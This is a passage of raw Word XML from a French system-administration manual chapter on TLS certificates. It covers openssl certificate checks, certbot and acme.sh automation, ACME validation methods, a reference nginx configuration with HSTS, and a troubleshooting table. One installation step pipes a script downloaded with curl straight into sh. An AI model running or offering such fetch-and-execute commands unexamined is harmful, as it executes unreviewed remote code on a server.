        <w:t>TLS 1.3 supprime les suites obsolètes, réduit la poignée de main à un aller-retour et impose la confidentialité persistante. TLS 1.2 reste présent pour compatibilité ; TLS 1.0 et 1.1 sont à désactiver.</w:t>
      </w:r>
    </w:p>
    <w:p>
      <w:pPr>
        <w:pStyle w:val="Heading3"/>
      </w:pPr>
      <w:r>
        <w:t>58.2 Certificats</w:t>
      </w:r>
    </w:p>
    <w:p>
      <w:pPr>
        <w:keepLines/>
        <w:widowControl w:val="0"/>
        <w:spacing w:before="0" w:after="150" w:line="348" w:lineRule="exact"/>
      </w:pPr>
      <w:r>
        <w:rPr>
          <w:rFonts w:ascii="Times New Roman" w:hAnsi="Times New Roman"/>
          <w:color w:val="1F2933"/>
          <w:sz w:val="22"/>
        </w:rPr>
        <w:t>Un certificat lie un nom à une clé publique, et il est signé. Sa validité repose sur trois vérifications : la chaîne de confiance, le nom, et les dates.</w:t>
      </w:r>
    </w:p>
    <w:p>
      <w:pPr>
        <w:pStyle w:val="LegendeCode"/>
        <w:keepNext/>
      </w:pPr>
      <w:r>
        <w:rPr>
          <w:rFonts w:ascii="Arial" w:hAnsi="Arial"/>
          <w:b/>
          <w:color w:val="274B6D"/>
          <w:sz w:val="16"/>
        </w:rPr>
        <w:t>Trois examens de certificat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Examiner un certificat</w:t>
        <w:br/>
        <w:t>openssl s_client -connect exemple.fr:443 -servername exemple.fr &lt;/dev/null</w:t>
        <w:br/>
        <w:t xml:space="preserve">  2&gt;/dev/null \</w:t>
        <w:br/>
        <w:t xml:space="preserve">  | openssl x509 -noout -subject -issuer -dates -ext subjectAltName</w:t>
        <w:br/>
        <w:br/>
        <w:t># Vérifier la chaîne complète</w:t>
        <w:br/>
        <w:t>openssl s_client -connect exemple.fr:443 -showcerts &lt;/dev/null</w:t>
        <w:br/>
        <w:br/>
        <w:t># Vérifier une date d'expiration à distance</w:t>
        <w:br/>
        <w:t>echo | openssl s_client -connect exemple.fr:443 2&gt;/dev/null \</w:t>
        <w:br/>
        <w:t xml:space="preserve">  | openssl x509 -noout -enddate</w:t>
      </w:r>
    </w:p>
    <w:p>
      <w:pPr>
        <w:pStyle w:val="Legende"/>
        <w:keepNext/>
      </w:pPr>
      <w:r>
        <w:rPr>
          <w:rFonts w:ascii="Arial" w:hAnsi="Arial"/>
          <w:i/>
          <w:color w:val="5B6770"/>
          <w:sz w:val="17"/>
        </w:rPr>
        <w:t>Tableau 0.205 — Cinq types de certificats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4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Type</w:t>
            </w:r>
          </w:p>
        </w:tc>
        <w:tc>
          <w:tcPr>
            <w:tcW w:type="dxa" w:w="286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Validation</w:t>
            </w:r>
          </w:p>
        </w:tc>
        <w:tc>
          <w:tcPr>
            <w:tcW w:type="dxa" w:w="273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r>
      <w:tr>
        <w:trPr>
          <w:cantSplit w:val="true"/>
        </w:trPr>
        <w:tc>
          <w:tcPr>
            <w:tcW w:type="dxa" w:w="3414"/>
            <w:tcMar>
              <w:top w:w="66" w:type="dxa"/>
              <w:left w:w="112" w:type="dxa"/>
              <w:bottom w:w="66" w:type="dxa"/>
              <w:right w:w="112" w:type="dxa"/>
            </w:tcMar>
            <w:vAlign w:val="center"/>
          </w:tcPr>
          <w:p>
            <w:pPr>
              <w:spacing w:before="0" w:after="0" w:line="260" w:lineRule="exact"/>
            </w:pPr>
            <w:r>
              <w:rPr>
                <w:rFonts w:ascii="Arial" w:hAnsi="Arial"/>
                <w:b/>
                <w:color w:val="0F2E4C"/>
                <w:sz w:val="19"/>
              </w:rPr>
              <w:t>DV (Domain Validation)</w:t>
            </w:r>
          </w:p>
        </w:tc>
        <w:tc>
          <w:tcPr>
            <w:tcW w:type="dxa" w:w="2868"/>
            <w:tcMar>
              <w:top w:w="66" w:type="dxa"/>
              <w:left w:w="112" w:type="dxa"/>
              <w:bottom w:w="66" w:type="dxa"/>
              <w:right w:w="112" w:type="dxa"/>
            </w:tcMar>
            <w:vAlign w:val="center"/>
          </w:tcPr>
          <w:p>
            <w:pPr>
              <w:spacing w:before="0" w:after="0" w:line="260" w:lineRule="exact"/>
            </w:pPr>
            <w:r>
              <w:rPr>
                <w:rFonts w:ascii="Arial" w:hAnsi="Arial"/>
                <w:color w:val="1F2933"/>
                <w:sz w:val="19"/>
              </w:rPr>
              <w:t>Contrôle du nom</w:t>
            </w:r>
          </w:p>
        </w:tc>
        <w:tc>
          <w:tcPr>
            <w:tcW w:type="dxa" w:w="2732"/>
            <w:tcMar>
              <w:top w:w="66" w:type="dxa"/>
              <w:left w:w="112" w:type="dxa"/>
              <w:bottom w:w="66" w:type="dxa"/>
              <w:right w:w="112" w:type="dxa"/>
            </w:tcMar>
            <w:vAlign w:val="center"/>
          </w:tcPr>
          <w:p>
            <w:pPr>
              <w:spacing w:before="0" w:after="0" w:line="260" w:lineRule="exact"/>
            </w:pPr>
            <w:r>
              <w:rPr>
                <w:rFonts w:ascii="Arial" w:hAnsi="Arial"/>
                <w:color w:val="1F2933"/>
                <w:sz w:val="19"/>
              </w:rPr>
              <w:t>Sites courants</w:t>
            </w:r>
          </w:p>
        </w:tc>
      </w:tr>
      <w:tr>
        <w:trPr>
          <w:cantSplit w:val="true"/>
        </w:trPr>
        <w:tc>
          <w:tcPr>
            <w:tcW w:type="dxa" w:w="341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OV (Organization Validation)</w:t>
            </w:r>
          </w:p>
        </w:tc>
        <w:tc>
          <w:tcPr>
            <w:tcW w:type="dxa" w:w="286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Documents de l'organisation</w:t>
            </w:r>
          </w:p>
        </w:tc>
        <w:tc>
          <w:tcPr>
            <w:tcW w:type="dxa" w:w="273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Entreprises</w:t>
            </w:r>
          </w:p>
        </w:tc>
      </w:tr>
      <w:tr>
        <w:trPr>
          <w:cantSplit w:val="true"/>
        </w:trPr>
        <w:tc>
          <w:tcPr>
            <w:tcW w:type="dxa" w:w="3414"/>
            <w:tcMar>
              <w:top w:w="66" w:type="dxa"/>
              <w:left w:w="112" w:type="dxa"/>
              <w:bottom w:w="66" w:type="dxa"/>
              <w:right w:w="112" w:type="dxa"/>
            </w:tcMar>
            <w:vAlign w:val="center"/>
          </w:tcPr>
          <w:p>
            <w:pPr>
              <w:spacing w:before="0" w:after="0" w:line="260" w:lineRule="exact"/>
            </w:pPr>
            <w:r>
              <w:rPr>
                <w:rFonts w:ascii="Arial" w:hAnsi="Arial"/>
                <w:b/>
                <w:color w:val="0F2E4C"/>
                <w:sz w:val="19"/>
              </w:rPr>
              <w:t>EV (Extended Validation)</w:t>
            </w:r>
          </w:p>
        </w:tc>
        <w:tc>
          <w:tcPr>
            <w:tcW w:type="dxa" w:w="2868"/>
            <w:tcMar>
              <w:top w:w="66" w:type="dxa"/>
              <w:left w:w="112" w:type="dxa"/>
              <w:bottom w:w="66" w:type="dxa"/>
              <w:right w:w="112" w:type="dxa"/>
            </w:tcMar>
            <w:vAlign w:val="center"/>
          </w:tcPr>
          <w:p>
            <w:pPr>
              <w:spacing w:before="0" w:after="0" w:line="260" w:lineRule="exact"/>
            </w:pPr>
            <w:r>
              <w:rPr>
                <w:rFonts w:ascii="Arial" w:hAnsi="Arial"/>
                <w:color w:val="1F2933"/>
                <w:sz w:val="19"/>
              </w:rPr>
              <w:t>Vérification renforcée</w:t>
            </w:r>
          </w:p>
        </w:tc>
        <w:tc>
          <w:tcPr>
            <w:tcW w:type="dxa" w:w="2732"/>
            <w:tcMar>
              <w:top w:w="66" w:type="dxa"/>
              <w:left w:w="112" w:type="dxa"/>
              <w:bottom w:w="66" w:type="dxa"/>
              <w:right w:w="112" w:type="dxa"/>
            </w:tcMar>
            <w:vAlign w:val="center"/>
          </w:tcPr>
          <w:p>
            <w:pPr>
              <w:spacing w:before="0" w:after="0" w:line="260" w:lineRule="exact"/>
            </w:pPr>
            <w:r>
              <w:rPr>
                <w:rFonts w:ascii="Arial" w:hAnsi="Arial"/>
                <w:color w:val="1F2933"/>
                <w:sz w:val="19"/>
              </w:rPr>
              <w:t>Rare, peu d'effet visible</w:t>
            </w:r>
          </w:p>
        </w:tc>
      </w:tr>
      <w:tr>
        <w:trPr>
          <w:cantSplit w:val="true"/>
        </w:trPr>
        <w:tc>
          <w:tcPr>
            <w:tcW w:type="dxa" w:w="341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Auto-signé</w:t>
            </w:r>
          </w:p>
        </w:tc>
        <w:tc>
          <w:tcPr>
            <w:tcW w:type="dxa" w:w="286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Aucune</w:t>
            </w:r>
          </w:p>
        </w:tc>
        <w:tc>
          <w:tcPr>
            <w:tcW w:type="dxa" w:w="273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Interne, tests</w:t>
            </w:r>
          </w:p>
        </w:tc>
      </w:tr>
      <w:tr>
        <w:trPr>
          <w:cantSplit w:val="true"/>
        </w:trPr>
        <w:tc>
          <w:tcPr>
            <w:tcW w:type="dxa" w:w="3414"/>
            <w:tcMar>
              <w:top w:w="66" w:type="dxa"/>
              <w:left w:w="112" w:type="dxa"/>
              <w:bottom w:w="66" w:type="dxa"/>
              <w:right w:w="112" w:type="dxa"/>
            </w:tcMar>
            <w:vAlign w:val="center"/>
          </w:tcPr>
          <w:p>
            <w:pPr>
              <w:spacing w:before="0" w:after="0" w:line="260" w:lineRule="exact"/>
            </w:pPr>
            <w:r>
              <w:rPr>
                <w:rFonts w:ascii="Arial" w:hAnsi="Arial"/>
                <w:b/>
                <w:color w:val="0F2E4C"/>
                <w:sz w:val="19"/>
              </w:rPr>
              <w:t>Interne (PKI privée)</w:t>
            </w:r>
          </w:p>
        </w:tc>
        <w:tc>
          <w:tcPr>
            <w:tcW w:type="dxa" w:w="2868"/>
            <w:tcMar>
              <w:top w:w="66" w:type="dxa"/>
              <w:left w:w="112" w:type="dxa"/>
              <w:bottom w:w="66" w:type="dxa"/>
              <w:right w:w="112" w:type="dxa"/>
            </w:tcMar>
            <w:vAlign w:val="center"/>
          </w:tcPr>
          <w:p>
            <w:pPr>
              <w:spacing w:before="0" w:after="0" w:line="260" w:lineRule="exact"/>
            </w:pPr>
            <w:r>
              <w:rPr>
                <w:rFonts w:ascii="Arial" w:hAnsi="Arial"/>
                <w:color w:val="1F2933"/>
                <w:sz w:val="19"/>
              </w:rPr>
              <w:t>Autorité interne</w:t>
            </w:r>
          </w:p>
        </w:tc>
        <w:tc>
          <w:tcPr>
            <w:tcW w:type="dxa" w:w="2732"/>
            <w:tcMar>
              <w:top w:w="66" w:type="dxa"/>
              <w:left w:w="112" w:type="dxa"/>
              <w:bottom w:w="66" w:type="dxa"/>
              <w:right w:w="112" w:type="dxa"/>
            </w:tcMar>
            <w:vAlign w:val="center"/>
          </w:tcPr>
          <w:p>
            <w:pPr>
              <w:spacing w:before="0" w:after="0" w:line="260" w:lineRule="exact"/>
            </w:pPr>
            <w:r>
              <w:rPr>
                <w:rFonts w:ascii="Arial" w:hAnsi="Arial"/>
                <w:color w:val="1F2933"/>
                <w:sz w:val="19"/>
              </w:rPr>
              <w:t>Services internes</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UN CERTIFICAT AUTO-SIGNÉ N'EST PAS UNE SÉCURITÉ</w:t>
            </w:r>
          </w:p>
          <w:p>
            <w:pPr>
              <w:spacing w:before="0" w:after="100" w:line="316" w:lineRule="exact"/>
            </w:pPr>
            <w:r>
              <w:rPr>
                <w:rFonts w:ascii="Times New Roman" w:hAnsi="Times New Roman"/>
                <w:color w:val="1F2933"/>
                <w:sz w:val="21"/>
              </w:rPr>
              <w:t>Il chiffre mais n'authentifie pas : le client ne peut pas distinguer le vrai serveur d'une interception. Dans un réseau interne, déployez une autorité de certification interne et installez sa racine sur les machines.</w:t>
            </w:r>
          </w:p>
        </w:tc>
      </w:tr>
    </w:tbl>
    <w:p>
      <w:pPr>
        <w:spacing w:before="0" w:after="0" w:line="140" w:lineRule="exact"/>
      </w:pPr>
    </w:p>
    <w:p>
      <w:pPr>
        <w:pStyle w:val="Heading3"/>
      </w:pPr>
      <w:r>
        <w:t>58.3 Automatiser avec ACME</w:t>
      </w:r>
    </w:p>
    <w:p>
      <w:pPr>
        <w:keepLines/>
        <w:widowControl w:val="0"/>
        <w:spacing w:before="0" w:after="150" w:line="348" w:lineRule="exact"/>
      </w:pPr>
      <w:r>
        <w:rPr>
          <w:rFonts w:ascii="Times New Roman" w:hAnsi="Times New Roman"/>
          <w:color w:val="1F2933"/>
          <w:sz w:val="22"/>
        </w:rPr>
        <w:t>Un certificat oublié expire. L'automatisation n'est pas un confort : c'est la seule manière fiable de respecter une durée de vie de 90 jours.</w:t>
      </w:r>
    </w:p>
    <w:p>
      <w:pPr>
        <w:pStyle w:val="LegendeCode"/>
        <w:keepNext/>
      </w:pPr>
      <w:r>
        <w:rPr>
          <w:rFonts w:ascii="Arial" w:hAnsi="Arial"/>
          <w:b/>
          <w:color w:val="274B6D"/>
          <w:sz w:val="16"/>
        </w:rPr>
        <w:t>Une automatisation complète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Certbot avec Nginx</w:t>
        <w:br/>
        <w:t>apt install -y certbot python3-certbot-nginx</w:t>
        <w:br/>
        <w:t>certbot --nginx -d exemple.fr -d www.exemple.fr</w:t>
        <w:br/>
        <w:br/>
        <w:t># Vérifier le renouvellement automatique</w:t>
        <w:br/>
        <w:t>systemctl list-timers | grep certbot</w:t>
        <w:br/>
        <w:t>certbot renew --dry-run</w:t>
        <w:br/>
        <w:br/>
        <w:t># Renouvellement manuel et rechargement</w:t>
        <w:br/>
        <w:t>certbot renew --deploy-hook "systemctl reload nginx"</w:t>
      </w:r>
    </w:p>
    <w:p>
      <w:pPr>
        <w:pStyle w:val="LegendeCode"/>
        <w:keepNext/>
      </w:pPr>
      <w:r>
        <w:rPr>
          <w:rFonts w:ascii="Arial" w:hAnsi="Arial"/>
          <w:b/>
          <w:color w:val="274B6D"/>
          <w:sz w:val="16"/>
        </w:rPr>
        <w:t>Une alternative répandue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ACME avec un client plus léger</w:t>
        <w:br/>
        <w:t>curl https://get.acme.sh | sh -s email=admin@exemple.fr</w:t>
        <w:br/>
        <w:t>~/.acme.sh/acme.sh --issue -d exemple.fr -w /var/www/certbot</w:t>
        <w:br/>
        <w:br/>
        <w:t>~/.acme.sh/acme.sh --install-cert -d exemple.fr \</w:t>
        <w:br/>
        <w:t xml:space="preserve">  --key-file       /etc/nginx/tls/exemple.fr.key \</w:t>
        <w:br/>
        <w:t xml:space="preserve">  --fullchain-file /etc/nginx/tls/exemple.fr.crt \</w:t>
        <w:br/>
        <w:t xml:space="preserve">  --reloadcmd      "systemctl reload nginx"</w:t>
      </w:r>
    </w:p>
    <w:p>
      <w:pPr>
        <w:pStyle w:val="Legende"/>
        <w:keepNext/>
      </w:pPr>
      <w:r>
        <w:rPr>
          <w:rFonts w:ascii="Arial" w:hAnsi="Arial"/>
          <w:i/>
          <w:color w:val="5B6770"/>
          <w:sz w:val="17"/>
        </w:rPr>
        <w:t>Tableau 0.206 — Trois méthodes de validation</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Méthode de validation</w:t>
            </w:r>
          </w:p>
        </w:tc>
        <w:tc>
          <w:tcPr>
            <w:tcW w:type="dxa" w:w="382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Principe</w:t>
            </w:r>
          </w:p>
        </w:tc>
        <w:tc>
          <w:tcPr>
            <w:tcW w:type="dxa" w:w="218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Condition</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Arial" w:hAnsi="Arial"/>
                <w:b/>
                <w:color w:val="0F2E4C"/>
                <w:sz w:val="19"/>
              </w:rPr>
              <w:t>HTTP-01</w:t>
            </w:r>
          </w:p>
        </w:tc>
        <w:tc>
          <w:tcPr>
            <w:tcW w:type="dxa" w:w="3824"/>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Fichier servi sous </w:t>
            </w:r>
            <w:r>
              <w:rPr>
                <w:rFonts w:ascii="Courier New" w:hAnsi="Courier New"/>
                <w:color w:val="274B6D"/>
                <w:sz w:val="17"/>
              </w:rPr>
              <w:t>/.well-known/acme-challenge/</w:t>
            </w:r>
          </w:p>
        </w:tc>
        <w:tc>
          <w:tcPr>
            <w:tcW w:type="dxa" w:w="2185"/>
            <w:tcMar>
              <w:top w:w="66" w:type="dxa"/>
              <w:left w:w="112" w:type="dxa"/>
              <w:bottom w:w="66" w:type="dxa"/>
              <w:right w:w="112" w:type="dxa"/>
            </w:tcMar>
            <w:vAlign w:val="center"/>
          </w:tcPr>
          <w:p>
            <w:pPr>
              <w:spacing w:before="0" w:after="0" w:line="260" w:lineRule="exact"/>
            </w:pPr>
            <w:r>
              <w:rPr>
                <w:rFonts w:ascii="Arial" w:hAnsi="Arial"/>
                <w:color w:val="1F2933"/>
                <w:sz w:val="19"/>
              </w:rPr>
              <w:t>Port 80 accessible</w:t>
            </w:r>
          </w:p>
        </w:tc>
      </w:tr>
      <w:tr>
        <w:trPr>
          <w:cantSplit w:val="true"/>
        </w:trPr>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DNS-01</w:t>
            </w:r>
          </w:p>
        </w:tc>
        <w:tc>
          <w:tcPr>
            <w:tcW w:type="dxa" w:w="382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Enregistrement TXT temporaire</w:t>
            </w:r>
          </w:p>
        </w:tc>
        <w:tc>
          <w:tcPr>
            <w:tcW w:type="dxa" w:w="218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Accès à l'API DNS</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Arial" w:hAnsi="Arial"/>
                <w:b/>
                <w:color w:val="0F2E4C"/>
                <w:sz w:val="19"/>
              </w:rPr>
              <w:t>TLS-ALPN-01</w:t>
            </w:r>
          </w:p>
        </w:tc>
        <w:tc>
          <w:tcPr>
            <w:tcW w:type="dxa" w:w="3824"/>
            <w:tcMar>
              <w:top w:w="66" w:type="dxa"/>
              <w:left w:w="112" w:type="dxa"/>
              <w:bottom w:w="66" w:type="dxa"/>
              <w:right w:w="112" w:type="dxa"/>
            </w:tcMar>
            <w:vAlign w:val="center"/>
          </w:tcPr>
          <w:p>
            <w:pPr>
              <w:spacing w:before="0" w:after="0" w:line="260" w:lineRule="exact"/>
            </w:pPr>
            <w:r>
              <w:rPr>
                <w:rFonts w:ascii="Arial" w:hAnsi="Arial"/>
                <w:color w:val="1F2933"/>
                <w:sz w:val="19"/>
              </w:rPr>
              <w:t>Réponse pendant la négociation TLS</w:t>
            </w:r>
          </w:p>
        </w:tc>
        <w:tc>
          <w:tcPr>
            <w:tcW w:type="dxa" w:w="2185"/>
            <w:tcMar>
              <w:top w:w="66" w:type="dxa"/>
              <w:left w:w="112" w:type="dxa"/>
              <w:bottom w:w="66" w:type="dxa"/>
              <w:right w:w="112" w:type="dxa"/>
            </w:tcMar>
            <w:vAlign w:val="center"/>
          </w:tcPr>
          <w:p>
            <w:pPr>
              <w:spacing w:before="0" w:after="0" w:line="260" w:lineRule="exact"/>
            </w:pPr>
            <w:r>
              <w:rPr>
                <w:rFonts w:ascii="Arial" w:hAnsi="Arial"/>
                <w:color w:val="1F2933"/>
                <w:sz w:val="19"/>
              </w:rPr>
              <w:t>Port 443 libre</w:t>
            </w:r>
          </w:p>
        </w:tc>
      </w:tr>
    </w:tbl>
    <w:p>
      <w:pPr>
        <w:spacing w:before="0" w:after="0" w:line="80" w:lineRule="exact"/>
      </w:pPr>
    </w:p>
    <w:p>
      <w:pPr>
        <w:keepLines/>
        <w:widowControl w:val="0"/>
        <w:spacing w:before="0" w:after="150" w:line="348" w:lineRule="exact"/>
      </w:pPr>
      <w:r>
        <w:rPr>
          <w:rFonts w:ascii="Times New Roman" w:hAnsi="Times New Roman"/>
          <w:color w:val="1F2933"/>
          <w:sz w:val="22"/>
        </w:rPr>
        <w:t>DNS-01 est la seule méthode qui permet d'obtenir un certificat wildcard (</w:t>
      </w:r>
      <w:r>
        <w:rPr>
          <w:rFonts w:ascii="Courier New" w:hAnsi="Courier New"/>
          <w:color w:val="274B6D"/>
          <w:sz w:val="19"/>
        </w:rPr>
        <w:t>*.exemple.fr</w:t>
      </w:r>
      <w:r>
        <w:rPr>
          <w:rFonts w:ascii="Times New Roman" w:hAnsi="Times New Roman"/>
          <w:color w:val="1F2933"/>
          <w:sz w:val="22"/>
        </w:rPr>
        <w:t>) et qui fonctionne pour un serveur non exposé à Internet.</w:t>
      </w:r>
    </w:p>
    <w:p>
      <w:pPr>
        <w:pStyle w:val="Heading3"/>
      </w:pPr>
      <w:r>
        <w:t>58.4 Configurer correctement</w:t>
      </w:r>
    </w:p>
    <w:p>
      <w:pPr>
        <w:keepLines/>
        <w:widowControl w:val="0"/>
        <w:spacing w:before="0" w:after="150" w:line="348" w:lineRule="exact"/>
      </w:pPr>
      <w:r>
        <w:rPr>
          <w:rFonts w:ascii="Times New Roman" w:hAnsi="Times New Roman"/>
          <w:color w:val="1F2933"/>
          <w:sz w:val="22"/>
        </w:rPr>
        <w:t>Une configuration TLS se juge sur trois points : versions autorisées, algorithmes, et redirection permanente depuis HTTP.</w:t>
      </w:r>
    </w:p>
    <w:p>
      <w:pPr>
        <w:pStyle w:val="LegendeCode"/>
        <w:keepNext/>
      </w:pPr>
      <w:r>
        <w:rPr>
          <w:rFonts w:ascii="Arial" w:hAnsi="Arial"/>
          <w:b/>
          <w:color w:val="274B6D"/>
          <w:sz w:val="16"/>
        </w:rPr>
        <w:t>Une configuration de référence · nginx</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Nginx</w:t>
        <w:br/>
        <w:t>server {</w:t>
        <w:br/>
        <w:t xml:space="preserve">    listen 80;</w:t>
        <w:br/>
        <w:t xml:space="preserve">    server_name exemple.fr www.exemple.fr;</w:t>
        <w:br/>
        <w:t xml:space="preserve">    return 301 https://exemple.fr$request_uri;</w:t>
        <w:br/>
        <w:t>}</w:t>
        <w:br/>
        <w:br/>
        <w:t>server {</w:t>
        <w:br/>
        <w:t xml:space="preserve">    listen 443 ssl;</w:t>
        <w:br/>
        <w:t xml:space="preserve">    http2 on;</w:t>
        <w:br/>
        <w:t xml:space="preserve">    server_name exemple.fr;</w:t>
        <w:br/>
        <w:br/>
        <w:t xml:space="preserve">    ssl_certificate     /etc/letsencrypt/live/exemple.fr/fullchain.pem;</w:t>
        <w:br/>
        <w:t xml:space="preserve">    ssl_certificate_key /etc/letsencrypt/live/exemple.fr/privkey.pem;</w:t>
        <w:br/>
        <w:br/>
        <w:t xml:space="preserve">    ssl_protocols TLSv1.2 TLSv1.3;</w:t>
        <w:br/>
        <w:t xml:space="preserve">    ssl_prefer_server_ciphers off;</w:t>
        <w:br/>
        <w:t xml:space="preserve">    ssl_session_cache shared:SSL:10m;</w:t>
        <w:br/>
        <w:t xml:space="preserve">    ssl_session_timeout 1d;</w:t>
        <w:br/>
        <w:br/>
        <w:t>add_header Strict-Transport-Security "max-age=63072000; includeSubDomains"</w:t>
        <w:br/>
        <w:t xml:space="preserve">      always;</w:t>
        <w:br/>
        <w:t xml:space="preserve">    add_header X-Content-Type-Options nosniff always;</w:t>
        <w:br/>
        <w:br/>
        <w:t xml:space="preserve">    root /var/www/site;</w:t>
        <w:br/>
        <w:t xml:space="preserve">    index index.html;</w:t>
        <w:br/>
        <w:t>}</w:t>
      </w:r>
    </w:p>
    <w:p>
      <w:pPr>
        <w:pStyle w:val="LegendeCode"/>
        <w:keepNext/>
      </w:pPr>
      <w:r>
        <w:rPr>
          <w:rFonts w:ascii="Arial" w:hAnsi="Arial"/>
          <w:b/>
          <w:color w:val="274B6D"/>
          <w:sz w:val="16"/>
        </w:rPr>
        <w:t>Deux vérifications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Vérifier et recharger</w:t>
        <w:br/>
        <w:t>nginx -t &amp;&amp; systemctl reload nginx</w:t>
        <w:br/>
        <w:br/>
        <w:t># Tester les versions négociées</w:t>
        <w:br/>
        <w:t>openssl s_client -connect exemple.fr:443 -tls1_1 &lt;/dev/null 2&gt;&amp;1 | grep -i</w:t>
        <w:br/>
        <w:t xml:space="preserve">  error</w:t>
        <w:br/>
        <w:t>openssl s_client -connect exemple.fr:443 -tls1_3 &lt;/dev/null 2&gt;&amp;1 | grep</w:t>
        <w:br/>
        <w:t xml:space="preserve">  Protocol</w:t>
      </w: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HSTS A DES CONSÉQUENCES</w:t>
            </w:r>
          </w:p>
          <w:p>
            <w:pPr>
              <w:spacing w:before="0" w:after="100" w:line="316" w:lineRule="exact"/>
            </w:pPr>
            <w:r>
              <w:rPr>
                <w:rFonts w:ascii="Courier New" w:hAnsi="Courier New"/>
                <w:color w:val="274B6D"/>
                <w:sz w:val="18"/>
              </w:rPr>
              <w:t>Strict-Transport-Security</w:t>
            </w:r>
            <w:r>
              <w:rPr>
                <w:rFonts w:ascii="Times New Roman" w:hAnsi="Times New Roman"/>
                <w:color w:val="1F2933"/>
                <w:sz w:val="21"/>
              </w:rPr>
              <w:t xml:space="preserve"> interdit au navigateur tout accès en HTTP pendant la durée indiquée. Un </w:t>
            </w:r>
            <w:r>
              <w:rPr>
                <w:rFonts w:ascii="Courier New" w:hAnsi="Courier New"/>
                <w:color w:val="274B6D"/>
                <w:sz w:val="18"/>
              </w:rPr>
              <w:t>max-age</w:t>
            </w:r>
            <w:r>
              <w:rPr>
                <w:rFonts w:ascii="Times New Roman" w:hAnsi="Times New Roman"/>
                <w:color w:val="1F2933"/>
                <w:sz w:val="21"/>
              </w:rPr>
              <w:t xml:space="preserve"> long sur un sous-domaine mal configuré peut rendre un service inaccessible. Commencez par une durée courte.</w:t>
            </w:r>
          </w:p>
        </w:tc>
      </w:tr>
    </w:tbl>
    <w:p>
      <w:pPr>
        <w:spacing w:before="0" w:after="0" w:line="140" w:lineRule="exact"/>
      </w:pPr>
    </w:p>
    <w:p>
      <w:pPr>
        <w:pStyle w:val="Heading3"/>
      </w:pPr>
      <w:r>
        <w:t>58.5 Diagnostiquer</w:t>
      </w:r>
    </w:p>
    <w:p>
      <w:pPr>
        <w:pStyle w:val="Legende"/>
        <w:keepNext/>
      </w:pPr>
      <w:r>
        <w:rPr>
          <w:rFonts w:ascii="Arial" w:hAnsi="Arial"/>
          <w:i/>
          <w:color w:val="5B6770"/>
          <w:sz w:val="17"/>
        </w:rPr>
        <w:t>Tableau 0.207 — Six symptômes et leurs causes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63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Symptôme</w:t>
            </w:r>
          </w:p>
        </w:tc>
        <w:tc>
          <w:tcPr>
            <w:tcW w:type="dxa" w:w="319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Cause probable</w:t>
            </w:r>
          </w:p>
        </w:tc>
        <w:tc>
          <w:tcPr>
            <w:tcW w:type="dxa" w:w="319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Vérification</w:t>
            </w:r>
          </w:p>
        </w:tc>
      </w:tr>
      <w:tr>
        <w:trPr>
          <w:cantSplit w:val="true"/>
        </w:trPr>
        <w:tc>
          <w:tcPr>
            <w:tcW w:type="dxa" w:w="2635"/>
            <w:tcMar>
              <w:top w:w="66" w:type="dxa"/>
              <w:left w:w="112" w:type="dxa"/>
              <w:bottom w:w="66" w:type="dxa"/>
              <w:right w:w="112" w:type="dxa"/>
            </w:tcMar>
            <w:vAlign w:val="center"/>
          </w:tcPr>
          <w:p>
            <w:pPr>
              <w:spacing w:before="0" w:after="0" w:line="260" w:lineRule="exact"/>
            </w:pPr>
            <w:r>
              <w:rPr>
                <w:rFonts w:ascii="Arial" w:hAnsi="Arial"/>
                <w:b/>
                <w:color w:val="0F2E4C"/>
                <w:sz w:val="19"/>
              </w:rPr>
              <w:t>Certificat expiré</w:t>
            </w:r>
          </w:p>
        </w:tc>
        <w:tc>
          <w:tcPr>
            <w:tcW w:type="dxa" w:w="3190"/>
            <w:tcMar>
              <w:top w:w="66" w:type="dxa"/>
              <w:left w:w="112" w:type="dxa"/>
              <w:bottom w:w="66" w:type="dxa"/>
              <w:right w:w="112" w:type="dxa"/>
            </w:tcMar>
            <w:vAlign w:val="center"/>
          </w:tcPr>
          <w:p>
            <w:pPr>
              <w:spacing w:before="0" w:after="0" w:line="260" w:lineRule="exact"/>
            </w:pPr>
            <w:r>
              <w:rPr>
                <w:rFonts w:ascii="Arial" w:hAnsi="Arial"/>
                <w:color w:val="1F2933"/>
                <w:sz w:val="19"/>
              </w:rPr>
              <w:t>Renouvellement manuel</w:t>
            </w:r>
          </w:p>
        </w:tc>
        <w:tc>
          <w:tcPr>
            <w:tcW w:type="dxa" w:w="3190"/>
            <w:tcMar>
              <w:top w:w="66" w:type="dxa"/>
              <w:left w:w="112" w:type="dxa"/>
              <w:bottom w:w="66" w:type="dxa"/>
              <w:right w:w="112" w:type="dxa"/>
            </w:tcMar>
            <w:vAlign w:val="center"/>
          </w:tcPr>
          <w:p>
            <w:pPr>
              <w:spacing w:before="0" w:after="0" w:line="260" w:lineRule="exact"/>
            </w:pPr>
            <w:r>
              <w:rPr>
                <w:rFonts w:ascii="Courier New" w:hAnsi="Courier New"/>
                <w:color w:val="274B6D"/>
                <w:sz w:val="17"/>
              </w:rPr>
              <w:t>openssl s_client</w:t>
            </w:r>
          </w:p>
        </w:tc>
      </w:tr>
      <w:tr>
        <w:trPr>
          <w:cantSplit w:val="true"/>
        </w:trPr>
        <w:tc>
          <w:tcPr>
            <w:tcW w:type="dxa" w:w="263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Nom absent du SAN</w:t>
            </w:r>
          </w:p>
        </w:tc>
        <w:tc>
          <w:tcPr>
            <w:tcW w:type="dxa" w:w="319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Mauvais domaine couvert</w:t>
            </w:r>
          </w:p>
        </w:tc>
        <w:tc>
          <w:tcPr>
            <w:tcW w:type="dxa" w:w="319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subjectAltName</w:t>
            </w:r>
          </w:p>
        </w:tc>
      </w:tr>
      <w:tr>
        <w:trPr>
          <w:cantSplit w:val="true"/>
        </w:trPr>
        <w:tc>
          <w:tcPr>
            <w:tcW w:type="dxa" w:w="2635"/>
            <w:tcMar>
              <w:top w:w="66" w:type="dxa"/>
              <w:left w:w="112" w:type="dxa"/>
              <w:bottom w:w="66" w:type="dxa"/>
              <w:right w:w="112" w:type="dxa"/>
            </w:tcMar>
            <w:vAlign w:val="center"/>
          </w:tcPr>
          <w:p>
            <w:pPr>
              <w:spacing w:before="0" w:after="0" w:line="260" w:lineRule="exact"/>
            </w:pPr>
            <w:r>
              <w:rPr>
                <w:rFonts w:ascii="Arial" w:hAnsi="Arial"/>
                <w:b/>
                <w:color w:val="0F2E4C"/>
                <w:sz w:val="19"/>
              </w:rPr>
              <w:t>Chaîne incomplète</w:t>
            </w:r>
          </w:p>
        </w:tc>
        <w:tc>
          <w:tcPr>
            <w:tcW w:type="dxa" w:w="3190"/>
            <w:tcMar>
